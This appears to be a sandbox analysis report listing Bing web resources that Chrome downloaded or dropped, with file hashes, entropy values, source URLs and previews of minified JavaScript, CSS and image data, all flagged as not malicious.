                                                                            Preview:.id_tooltip_container .id_button{padding:0 !important;margin:0 !important;margin-inline-start:8px !important;width:50px;text-align:center}.id_tooltip_container .tooltip_hide,.id_tooltip_container #id_rh,.id_tooltip_container #id_rbh,.id_tooltip_container #id_rfob,.id_tooltip_container #id_rh_w{width:auto}.id_tooltip_container #id_rh_w #rh_rwm.serp{margin-left:0}.id_tooltip_container .id_button{position:relative}.id_tooltip_container .id_button:hover::before,.id_tooltip_container #rh_rwm:hover::before{top:100%;left:50%;position:absolute;background-color:#666;width:12px;height:12px;content:"";transform:translateX(-50%) rotate(45deg);z-index:6;visibility:visible}.id_tooltip_container .id_button:hover::after,.id_tooltip_container #id_rh:hover:after,.id_tooltip_container #rh_rwm:hover::after{top:calc(100% + 5px);left:50%;position:absolute;background-color:#666;content:attr(aria-label);font:13px/18px Arial,Helvetica,sans-serif;white-space:nowrap !important;width:auto !important;color:#fff;pa
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):212
                                                                            Entropy (8bit):4.813377529566751
                                                                            Encrypted:false
                                                                            SSDEEP:6:qpC4DpTSp/jhiwW24kElpyhq2GpdIlYfA1RKqB:ipTC/jhVW24kElpyMhpdIlYfALK4
                                                                            MD5:F9C1A051CDD4FF16E2EE6DE304E9B2F6
                                                                            SHA1:A52C395C78C6D0C0E2F7A8448A340CB996622D95
                                                                            SHA-256:620840599904AEEFD4C9FA2AFD71F48DFECD8E29092B35221FBDA340488486A9
                                                                            SHA-512:0C45FDB66E6CF8DBE77B25265A985187E2BD5A190E08F23B82533D24857A8365C7EC954DF2BCA889990A585D5D4BF7F176C050DCC7682453778E8874E2441367
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var searchForm,content;_G.JCache&&(searchForm=_ge(keyMap.SearchForm),_G.SRF=searchForm&&searchForm.outerHTML,content=_ge(keyMap.Content),content||(content=_ge("sw_content")),_G.CNT=content?content.outerHTML:null)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (918), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):918
                                                                            Entropy (8bit):5.212381384143468
                                                                            Encrypted:false
                                                                            SSDEEP:24:i2387E/Xv3qtMbKRgibYe9BqoGbKR7oGbY7oGbnewCY0ZWFU0fZy5c6MwQOR:dqtMbK7bLrGbKuGbjGbnXTWWSr5c6MwV
                                                                            MD5:341FC0ACD15DF6D8A064E4C3A896F65D
                                                                            SHA1:1258FD48A874D80CB635BE454F9E4023A0DF7C49
                                                                            SHA-256:4BC6635D4D95F9C05A91904B19370A40CC6E4C2AB43661C00615EDDADEFCF9EB
                                                                            SHA-512:6B552D786E782C36F17BEE1A6AE204F1E8C9F85BE5EB9ADAC1793D60B537CAD13228CB2D4299949F051E6BC364C2E5A4105DE9BBF2885F492EDB425CB14CE982
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Elj9SKh02Ay2Nb5FT55AI6DffEk.js
                                                                            Preview:var KeyPressScroll;(function(){function i(i){var u=i.key,f=document.activeElement,r,e,o;document.querySelector("cib-serp[mode='conversation']")||document.querySelector(".b_selected")||typeof i.composedPath=="function"&&(r=i.composedPath(),r&&r[0]&&(r[0]instanceof HTMLInputElement||r[0]instanceof HTMLTextAreaElement))||i.ctrlKey||i.shiftKey||i.metaKey||i.altKey||!u||u.length!==1||u===" "||f instanceof HTMLInputElement||f instanceof HTMLTextAreaElement||f instanceof HTMLElement&&f.isContentEditable||(typeof sj_log=="function"&&sj_log("CI.KeyPressScroll","KeyBoard_Triggered",u),n.value="",t.scrollIntoView({behavior:"smooth"}),t.style.display="block",e=_ge("sb_form"),e&&Lib.CssClass.remove(e,"form_sb_hidden"),n.focus(),n.click(),o=n.value,n.setSelectionRange(o.length,o.length))}function r(){n&&t&&sj_be(document,"keydown",i,!0)}var n=_ge("sb_form_q"),t=_ge("b_header");r()})(KeyPressScroll||(KeyPressScroll={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):226
                                                                            Entropy (8bit):4.923112772413901
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                            MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                            SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                            SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                            SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/MWgq_OYohQuMsx-qjpxMXsnruVc.js
                                                                            Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2723), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2723
                                                                            Entropy (8bit):5.050741988064552
                                                                            Encrypted:false
                                                                            SSDEEP:48:wminPqr6wxAIKxpIFOG79JG+S96G+MMCSZgS3dVefNfQj1PxDg5dkGDGTtfWfD5g:1B2DSGp6Glo33jlJWdkGDGTwg
                                                                            MD5:AE11A6F7A0B245BE17E623D1A12765F4
                                                                            SHA1:04C88980E6A64172168E0D0A08417FADE9EE9F01
                                                                            SHA-256:2975D032E0C1A31BCB5E0CD03EEF528880968944940C7F5CE39A49CB9AC09CFC
                                                                            SHA-512:3090F8640D2F650B5492468784921D2600C33DED50A348483EEDC93F4EEE816E794D2C7A5475D098813679316A11F560C8220F8A99AF1DD3E52357806333D9A0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rb/5U/cir3,cc,nc/M8mZl-uWUd-QStfbINBlY6E3LHI.css?bu=Bm5ujBToFeMXbg&or=w"
                                                                            Preview:a{z:1}a{z:1}#b_header .b_searchboxForm,#uaanswer .b_searchboxForm{border-radius:24px}#b_header .b_searchbox,#uaanswer .b_searchboxForm{border-radius:24px}.as_on #b_header .b_searchboxForm{border-radius:24px 24px 0 0}.as_no_s #b_header .b_searchboxForm,.as_nw #b_header .b_searchboxForm{border-radius:24px}#b_header #sw_as{top:1px}#b_header #sw_as #sa_ul,#uaanswer #sw_as #sa_ul,#sw_as #sa_ul li:last-of-type,.as_on #sw_as .sa_as{border-radius:0 0 24px 24px}.b_searchboxForm:focus-within .inline_sb.serpas_sb_combo{margin-right:5px}.b_searchboxForm:focus-within .inline_sb:not(.serpas_sb_combo){border-radius:20px}.sb_bpr{height:44px;line-height:40px}#sb_clt.sb_clrhov{display:inline-block;overflow:visible;top:0;margin:3px 0;vertical-align:middle}#sb_clt #sw_clx{padding:9px;height:22px;display:inline-block;line-height:20px}#sb_clt[data-sbtipx]:hover::before{bottom:-15px;left:50%}#sb_clt[data-sbtipx]:hover::after{left:50%;top:49px}#b_header .b_searchboxForm #sbiarea{margin:3px 0;vertical-align:mi
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (417), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):417
                                                                            Entropy (8bit):5.156104263225177
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Q+pkHXYqfRRO7UegY7knZUSFRO7UegY7knTZcnPsM:2QzRfOoeZwnZUSbOoeZwnTy1
                                                                            MD5:5F3115C3009AFF3032B00F3F31C28603
                                                                            SHA1:D9F5F57B2B591B345F2438935C326A24FB0B0399
                                                                            SHA-256:A487C62D5426112A6BBD972231976718299A30F38A2E56928334743DAFAB6419
                                                                            SHA-512:2511E1486A072F94A810385E3BDEE26FEBDA2823BE99EBBD67C7676B0DE36D504D0DBE00C40A2762440526D8F543C7B863BE12E41F10F82FA026AE1FAE8E3443
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){var i,r,u,f,n,t;_w.sj_log&&(f=_qs("input#sb_form_q"),n=_qs("textarea#sb_form_q"),f&&(t=(i=f.value)===null||i===void 0?void 0:i.length,sj_log("CI.SERPSB","CharCount",t.toString()),sj_log("CI.SERPSB","LandingRows","1")),n&&(t=(r=n.value)===null||r===void 0?void 0:r.length,sj_log("CI.SERPSB","CharCount",t.toString()),sj_log("CI.SERPSB","LandingRows",(u=n.rows)===null||u===void 0?void 0:u.toString())))})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (891), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):891
                                                                            Entropy (8bit):5.1332488883366585
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QG5MCVFmMCBTotKMCWqEZWMCUHK09nzEIzGln:GbGb+Eb5EgbCr9nz+ln
                                                                            MD5:02B0B245D09DC56BBE4F1A9F1425AC35
                                                                            SHA1:868259C7DC5175A9CC1E2EC835F3D9B4BD3F5673
                                                                            SHA-256:62991181637343332D7B105A605AB69D70D1256092355CFC4359BEE7BDBFB9C6
                                                                            SHA-512:CBB43000A142807FF1BB3BFAC715CEF1240233117C728F357C824CE65B06BE493DF2306C7B03598817F09B02E9E36EC52314F88467679C5BEF3EE1504A10C7E6
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function e(){var t,r;n&&(n.value.length>0?(t=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||t===void 0?void 0:t.add(sj_b,i):(r=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||r===void 0?void 0:r.remove(sj_b,i))}function o(t){var e,o;n.value="";n.innerText="";u&&f&&(u.innerText="",f.classList.remove("nudgeVisible"));(e=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||e===void 0?void 0:e.remove(sj_b,i);sj_log("CI.XButton","Clicked","1");r&&((o=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||o===void 0?void 0:o.add(r,"b_focus"));n.focus();n.click();t&&(t.preventDefault(),t.stopPropagation())}var r=_ge("b_header"),n=_ge("sb_form_q"),t=_ge("sb_clt"),u=_qs(".qfc.b_searchbox .ghost"),f=_qs(".qfc.b_searchbox .nudge"),i="b_sbText";n&&t&&(sj_be(t,"click",o),sj_be(t,"keydown",function(n){var t=n.code||n.key;t==="Enter"&&o(n)}),sj_be(n,"keyup",e),e())})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):4565
                                                                            Entropy (8bit):7.879534543139402
                                                                            Encrypted:false
                                                                            SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                            MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                            SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                            SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                            SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (918), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):918
                                                                            Entropy (8bit):5.212381384143468
                                                                            Encrypted:false
                                                                            SSDEEP:24:i2387E/Xv3qtMbKRgibYe9BqoGbKR7oGbY7oGbnewCY0ZWFU0fZy5c6MwQOR:dqtMbK7bLrGbKuGbjGbnXTWWSr5c6MwV
                                                                            MD5:341FC0ACD15DF6D8A064E4C3A896F65D
                                                                            SHA1:1258FD48A874D80CB635BE454F9E4023A0DF7C49
                                                                            SHA-256:4BC6635D4D95F9C05A91904B19370A40CC6E4C2AB43661C00615EDDADEFCF9EB
                                                                            SHA-512:6B552D786E782C36F17BEE1A6AE204F1E8C9F85BE5EB9ADAC1793D60B537CAD13228CB2D4299949F051E6BC364C2E5A4105DE9BBF2885F492EDB425CB14CE982
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var KeyPressScroll;(function(){function i(i){var u=i.key,f=document.activeElement,r,e,o;document.querySelector("cib-serp[mode='conversation']")||document.querySelector(".b_selected")||typeof i.composedPath=="function"&&(r=i.composedPath(),r&&r[0]&&(r[0]instanceof HTMLInputElement||r[0]instanceof HTMLTextAreaElement))||i.ctrlKey||i.shiftKey||i.metaKey||i.altKey||!u||u.length!==1||u===" "||f instanceof HTMLInputElement||f instanceof HTMLTextAreaElement||f instanceof HTMLElement&&f.isContentEditable||(typeof sj_log=="function"&&sj_log("CI.KeyPressScroll","KeyBoard_Triggered",u),n.value="",t.scrollIntoView({behavior:"smooth"}),t.style.display="block",e=_ge("sb_form"),e&&Lib.CssClass.remove(e,"form_sb_hidden"),n.focus(),n.click(),o=n.value,n.setSelectionRange(o.length,o.length))}function r(){n&&t&&sj_be(document,"keydown",i,!0)}var n=_ge("sb_form_q"),t=_ge("b_header");r()})(KeyPressScroll||(KeyPressScroll={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 150177
                                                                            Category:downloaded
                                                                            Size (bytes):52015
                                                                            Entropy (8bit):7.9952734547685935
                                                                            Encrypted:true
                                                                            SSDEEP:1536:vJhGm+7PUzhQu7xb5fpuSijlAVYYHNkPyJvs:RoA9l7FPRuAVYYHiPyJvs
                                                                            MD5:5F28D22CDF37837FA88F08A2050983AF
                                                                            SHA1:2FC8592FB2E4BE8193919AD56EE8588B24E7C0BE
                                                                            SHA-256:6E207B57EF73C7406D23E2533231E94B58B3C52AC63D208EC6664B152EC5B544
                                                                            SHA-512:DD526C86ACD7D940E54F9F6F848F03A4881DF9E17A067E7231E3D1765D846D0741FAFA8D7C89395B644CB6E0CB71098807411A0F534EA148379D23D31A032104
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/FetchSessions_Core_9mEr1-U6IfYSYEIq9V-gwA2.js
                                                                            Preview:...........k[.H.0........F._...q.UE7....s..m..%$.I.....q.L.d....g....HyWdDdDdd...+.U....................9...vzvy.....`....C...A.....K.Q-.jqR..a.L........I...q.?...6I.?.a... ........%...d/..s.....Zp.DP{.O^..!.Eq.........^..M.......C.$.&q...Z.....:I..^..y._K..6....Q....h5.n........48..._.. .!N...X'...6.....8.Z..^..}.=At_..=........F.aV/|f.'O8.0..P<...R.{..:..i.R.O..A...............Tu.R..'0..2..Y<..!.-5...~].A..g.G...i.l5....F..,.....}.=L..a..1......._..F....N..L..1...O.0..A......\..Q.....g.}Y..h......?..$....4...L...ZdF..'.....;p.........{.^.v.wA=......Y..\..............?x..s. ...L.!......_'.....d.>....X6>.... ..y.w5...4i......E-.WW..9....5....83-...tgs;vgM.1.((...`l&.....4.j.\.4.:L;T..$w.8..:+M[d:...#*.X....vf.../........(.o........^.x/ZF..h/...3._c.wc..B......`n..\....$...K....z...,y!...W..b.WLEb.....oX.....4%.S$..nZ..H.........l..x......&vD.S.&...l.6 .H.....|>....].u|;..taJ^.0Jk.-fZ...!...[.(..8...7r.o.......Cbi.K...{.M.........)}DJF<.W..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):200
                                                                            Entropy (8bit):4.806038649841674
                                                                            Encrypted:false
                                                                            SSDEEP:3:qbogfTop3n+4MGaoW4HaWXDQrm/EA3NIpKONc+jACM3HlKBGavyxRNV+bo3oZZ7n:qjop3+BfrmsA3NIpltA3HlKBpoin7n
                                                                            MD5:8CF13351D20909508A6EF0E9D0BDD402
                                                                            SHA1:5B982CDDD68B02F4061F2F4D1E92E743A42791F5
                                                                            SHA-256:8BA5344E1CBB2DB11B70CE22944FDB5A65083E327114078D2FFAA827B5459AF2
                                                                            SHA-512:8C493DD64D07C5046D2EF3D4AE446F29F3447F354B79CFD8907B5BFDDA1871E996B4C518DC891FD20FD5C6F1AD3277F14B5F744965D0C7DC2345908ECBC7477E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/W5gs3daLAvQGHy9NHpLnQ6QnkfU.js
                                                                            Preview:var SWRM;(function(n){!n.Unregister||"Notification"in _w&&Notification.permission==="granted"||(n.Unregister(),Log.Log("SWRM","Unregister","Notification permission is not granted"))})(SWRM||(SWRM={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1060
                                                                            Entropy (8bit):5.351152776949957
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1nAA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGD0zRPo
                                                                            MD5:F4DA106E481B3E221792289864C2D02A
                                                                            SHA1:D8BA5C1615A4A8ED8EE93C5C8E2EA0FB490A0994
                                                                            SHA-256:47CB84D180C1D6BA7578C379BDC396102043B31233544E25A5A6F738BB425AC9
                                                                            SHA-512:66518EE1B6C0DF613074E500A393E973844529CA81437C4BAFE6BF111CBA4D697AF4FE36B8D1B2AA9B25F3EB93CD76DF63ABFC3269AC7E9F87C5F28A3764008E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/2LpcFhWkqO2O6Txcji6g-0kKCZQ.js
                                                                            Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(document.body,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (539), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):539
                                                                            Entropy (8bit):5.050238210471519
                                                                            Encrypted:false
                                                                            SSDEEP:12:qaUVSeLTurUfree1RAktZxYYaEeImxM0hJuKm6Ko9shAl+QY:PrUDee3AktZxYYaEenZJuKm6KoeYdY
                                                                            MD5:5CF5713D4024AA26BA70C9BE651BBDED
                                                                            SHA1:1A96A05DE5582D0233DB0CC5C76622482931E1D9
                                                                            SHA-256:F468689A4D87B488C54E71DFD5A97681BF72C0505A28A5402237C5E6D6E3856D
                                                                            SHA-512:EB61C169A2B0BE53FA53C258E205BFA98D54E2E0311F1B81876097EB8884AABA5C71F4623DE9CB8077796F7BF5472C1317E2109F2E86894B084A2FF4E1BA9372
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/GpagXeVYLQIz2wzFx2YiSCkx4dk.css
                                                                            Preview:.b_logoArea{text-align:right;width:140px;height:40px;margin:0 20px 0 0;vertical-align:top}.b_logo{text-align:left;vertical-align:top;position:relative;display:inline-block;width:116px;height:18px;margin-top:15px;text-indent:0;overflow:hidden;direction:ltr}.b_logo:after{position:relative;display:inline-block;transform:scale(.5)}#detailPage .b_logo,#bnp_cookie_banner .b_logo{transform:none}@media(forced-colors:active){.b_logo{forced-color-adjust:none;background-color:#000}}.b_logo:after{content:url(/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png)}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2850), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2850
                                                                            Entropy (8bit):5.351984550886732
                                                                            Encrypted:false
                                                                            SSDEEP:48:bfYHC/SmmnTLJAeobSrKXNaG1WaQ5HYXCMsVESuTA1IIfMxWe:M/nTLye1rKdBbQZYhiCTYpfpe
                                                                            MD5:802CE043AFF696F60C1AD84C359C24AE
                                                                            SHA1:9E31964C156864CF7AD2423A53FB43DD32609573
                                                                            SHA-256:9062C70FA349E6E953BC7833436FABC098D2371C74627D1BF6565D18A8457781
                                                                            SHA-512:18919B8259C0289B392B463235F886137F6FC460A403932F197830E9D8B55D0B18B337CB97033EF5E54B66FF7AD729001A980E94F5806711CB8515020EBB17F3
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/njGWTBVoZM960kI6U_tD3TJglXM.js
                                                                            Preview:function getBrowserWidth_Desk(){var t=_d.documentElement,n=Math.round(_w.innerWidth||t.clientWidth);return n<100&&(n=1496),n}function getBrowserHeight_Desk(){var t=_d.documentElement,n=Math.round(_w.innerHeight||t.clientHeight);return n<100&&(n=796),n}function getBrowserScrollWidth_Desk(){var n=Math.round(_d.body.clientWidth);return n<100&&(n=1496),n}function getBrowserScrollHeight_Desk(){var n=Math.round(_d.body.clientHeight);return n<100&&(n=796),n}(function(){function st(n,t){var i="XW",r;n<=it&&(i="W");n<=rt&&(i="M");n<=ut&&(i="N");n<=ft&&(i="S");n<=et&&(i="HTP");n<=ot&&(i="NOTP");r="T";t<=g&&(r="M");t<=nt&&(r="S");c(tt,i,"width",n.toString());c(d,r,"height",t.toString())}function c(r,u,f,e){l("Info",r,u,f,e);t(n,r)!=u&&i(n,r,u,!0,"/",null)}function l(n,t,i,r,u){typeof Log!="undefined"&&Log.Log&&Log.Log(n,t,i,!1,r,u)}function f(n,t,i){typeof Log!="undefined"&&Log.Log&&Log.Log(n,t,i)}function r(r,u,e){var o=t(n,u);o&&o===r||(i(n,u,r,!0,"/",null),o&&e&&f("Info","BRResize",e))}functio
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (497), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):497
                                                                            Entropy (8bit):4.867785160722678
                                                                            Encrypted:false
                                                                            SSDEEP:12:cWqtRy76iorRios3E2fAJyAJla0LiYZ7cio7dc1m2iorF6Q:7Ins3E6aya1R07dYvx6Q
                                                                            MD5:3499E20D55D3FCA3972494BEA985B6C2
                                                                            SHA1:8DDFCA8A4B42DEC016609B0E9F8B383E84AFBB5F
                                                                            SHA-256:ABC2B8744AF2F143432A5E6B194391ACCE013E9943E5D3D6BB802CB31C255EA2
                                                                            SHA-512:CD9DE32CDA8FF23F2BC19137C89AB1B6FBF2BB9564DB22D0839507EF502BF53787FBDED51EDE69F1541BD5AB19222BF7DD18E868A5ADF943151FC763B25F79A0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/jd_KiktC3sAWYJsOn4s4PoSvu18.css
                                                                            Preview:#b_tween{position:relative}#b_tween>div,#b_tween>span:not(.b_hide),#b_tween_searchTools>div,#b_tween_searchTools>span{display:inline-block}#b_content:not(.mapOverlayOnSerp) .b_hidetoggletween{display:none}#b_content:not(.mapOverlayOnSerp) #b_tween.b_hidetoggletween,#b_tween>div.b_hide{display:none}#b_tween_searchResults{line-height:30px}#b_tween_searchTools{height:30px}#b_tween>div>span{padding-right:25px}#b_tween #b_tween_searchTools .ftrH{padding-left:0}#b_tween .ftrB .b_dropdown{z-index:9}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 1030 x 92, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):9310
                                                                            Entropy (8bit):7.907965931624856
                                                                            Encrypted:false
                                                                            SSDEEP:192:qnmErbd5SU2ipCfR6VY9Fcygr2XecqN4zvEd4xSNzvkmglkz80bl7xcnobmP:S5bdAU3EJiHpSucq+z64xSlp40Bx8oKP
                                                                            MD5:1947B15739221EB0DB271C1DD8F95E46
                                                                            SHA1:900C22BFD81CE073DF1D2537C54429D97AA6E700
                                                                            SHA-256:FBF7FE8197902B32CE2C83F05DB73255553C716AC7B084FF1878E617963D0F51
                                                                            SHA-512:E73B17A0CCAEA85C539B5DA3BA978EBDA519D68F5686894EBEBBB529DCA54D07CA3508DBCED9D8F56D71D49469FA5916A7255B6CA455E00251D81B5E03410E5C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png
                                                                            Preview:.PNG........IHDR.......\.......Gi...sPLTEGpL.e"..?..?..=........................uut.............O..K..J..J..K..K..J..J..M..O..S..O.uux.V..K.....ffffff.I.2..1..%q..>. Y.$d.BFBDDDDDDBGB.K...........K.$i.#a.DDDDDDDDDuww......!\.DDDDDDuwx.J.....\.$g. Z.CCCvvzvxywx{"^.CCCvwywx{vvwvvzwx{vwxxx|wx{wxzfff%.....$h.DDDCCC.h..[..x.._..S.vvx...9..._.%h.!`.DDD...AHAuwx.R..O.m.cK.}....U.g.c..N.Qs.X..]d..8..&.c...2.....$........#..e....'..h.vw.......XS..i........[..b.rC.H=www...zzz........T..................................J...................qqqqqqqqq.k..m.......413..................vvv....l.......uuu....m..................................................."........".."...\......tRNS..@..@.....` ...p.@.......p .``P.P_.........Z...0........p0_....P0....@@....... .p........"..R..@...0..0..... ...w...0..@.....X.......b.......... `......P@....p1`P.......=............p....D@..M.'.....0....Y.... .IDATx...Ub.@...S.ic.A.....E.....=%0s...^k"..S)..cff.U.en..".FS.Bm.j.m.....&.,.Y.0..........k.E.*U
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1240), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1240
                                                                            Entropy (8bit):5.223677560423431
                                                                            Encrypted:false
                                                                            SSDEEP:24:LNW5gbRWwaxb3lN7gBSuRW+yaOTe6djrL14uZvhuLufrBChHNVYM:Bqgbwwaxb7gBNwQerLWuZZuLuNChEM
                                                                            MD5:E4BEAB3A36E7AE0CE172D24730A979A4
                                                                            SHA1:AD06A095B6A09C73BF2CA1793222EF13D23C228D
                                                                            SHA-256:1ADEF582C859ED9B4F071CD3196B66AC13503C1346176E78837ABCCB390249A1
                                                                            SHA-512:9A0503536A80348E2467A4A91DF33EABBD1688E93B3D8E68E538A7E39B094A1AEACDE7E23746A7804F180B64F49EC22BFDC24A10104E4A631464891C3133D19F
                                                                            Malicious:false
                                                                            Reputation:low
